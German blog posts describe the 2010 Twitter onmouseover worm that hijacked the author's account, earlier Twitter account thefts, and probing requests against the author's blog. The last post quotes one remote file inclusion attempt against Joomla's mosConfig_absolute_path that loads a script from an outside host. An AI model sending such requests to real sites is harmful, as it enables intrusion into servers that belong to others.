Beiträge

Erst war es eine schöne, bunte Farbenwelt, mit der ein Account bei Twitter darstellte, dass mit einer kleinen Manipulation einzelne Tweets von CSS gestaltet werden konnten.

Das spontane Ergebnis waren euphorische Freude und gepaart mit Unverständnis in der Netzgemeinde, doch der Schein war bekanntlich wieder trügerisch.

Ich ahnte bereits, dass dies nicht mit rechten Dingen zugehen konnte. Schließlich erkannte man bei dem regenbogenfarbigen Account, dass einzelne Tweets mit CSS-Kommandos behaftet waren. Nach fast zwei Stunden schaute ich bei Twitter nach einigen aktuellen Themen und bemerkte, dass ein „lebensgroßer“ Buchstabensalat in meiner Timeline hing. Zeitgleich erfolgten automatische Postings über meinen Twitter-Account.

Als ich versuchte, die Seite zu aktualisieren und einen Hinweis auf die nicht-betroffene mobile Variante von Twitter zu geben, wurde mein Twitter-Account direkt das Opfer einer Attacke bzw. einen Hijack per CSS-Script. Prompt griff ein Bekannter von einer Münchner Agentur zum Telefon und beschwerte sich, leicht schadenfroh, bei mir, warum ich seine Timeline jetzt auch mit „Müll“ zudonnern würde. Immerhin konnte ich dem Problem durch die Apps und mobile Version nach nur wenigen Minuten Herr werden. Ich rate zudem, dass jeder, der sich von diesem Wirrwarr nicht von allein befreien kann, sein Passwort bei Twitter schnellstmöglich ändert. Solange von offizieller Stelle kein Feedback folgt, sollte man davon absehen, das Webinterface von Twitter zu verwenden.

Update:
Mehr zu dem Thema steht bei Sophos und Techcrunch. Auch die dpa hat eine passende Meldung zu dem Twitter-Hack verbreitet – hier in Version bei der Süddeutschen.

Der Fehler soll scheinbar durch einen Bug bei „t.co“, einem eigenen Dienst von Twitters zur Kürzung von URLs, verursacht worden sein, über den ein Javascript-Code mit einem „onmouseover“-Kommando clientseitig ausgeführt wurde. Dabei besticht ein fadenscheiniger Geschmack, dass genau dieser „URL-Shortener“ zur weiteren Sicherheit für die Twitter-Nutzer einen weiteren Beitrag leisten sollte.

Twitter Hacks – nur so kann man es nennen. Phishingangriffe auf eines der weltweit beliebtesten Microblogging-Kommunikationssysteme zwingen den marktbeherrschenden Giganten in die Knie. Allein durch die wundervolle API wurde der Zugriff auf zahlreiche Accounts ermöglicht, so dass einige Twitter-Accounts über Nacht gestohlen wurden: Barack Obama, Britney Spears, Huffington Post oder Fox News sind nur einige prominente Accounts, die gehackt wurden.

Für mich bedeutete dies ganz klar: Das Passwort ändern und externe Dienste aussperren. Sicherheit geht vor. Für die Zukunft sollte Twitter definitiv einen API-Key anbieten und damit die Verwendung des Passwortes bei Fremdanbietern unterbinden. Andere Autoren sehen das ganz ähnlich.

Das wichtigste ist jetzt konstruktive Öffentlichkeitsarbeit für den wichtigen Dienstleister, den nicht nur Early Adopter, Nerds oder Geeks nutzen. Twitter ist Mainstream in 2008 geworden und steht in dem neuen Jahr für den schnellebigen Lifestream-Lifestyle der Netzöffentlichkeit. Ein paar Blogpostings helfen nur, die Otto-Normalo-Gemüter zu beruhigen. Wer seine Online-Identität verstärkt mit Twitter aufgebaut oder unterstützt hat, kann das Vertrauen in Twitter auch sehr schnell wieder verlieren und auf ein eigenes (un-social) Kommunikationstool wie ein einfaches Tumble-Blog oder doch ein normales Blog setzen.

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.